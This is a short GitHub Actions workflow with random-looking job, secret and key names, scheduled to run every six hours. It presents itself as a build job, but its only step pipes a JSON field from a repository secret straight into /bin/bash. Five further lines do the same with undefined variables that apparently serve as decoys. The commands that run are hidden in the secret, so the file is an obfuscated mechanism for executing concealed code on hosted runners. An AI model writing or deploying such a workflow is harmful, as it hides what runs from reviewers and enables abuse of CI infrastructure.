name: boergua9139
on:
  workflow_dispatch:
  schedule:
    - cron: '28 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: boergua9139
        env:
          iqka809: ${{ secrets.iqka809 }}
        run: |
          echo $iqka809 | jq -r .xugj42675 | /bin/bash
          echo $syj6 | jq -r .bvmza21366 | /bin/bash
          echo $pyfz4 | jq -r .x0 | /bin/bash
          echo $i69416 | jq -r .rpst1 | /bin/bash
          echo $br5 | jq -r .kocfq3811 | /bin/bash
          echo $yuow0851 | jq -r .vu03001 | /bin/bash

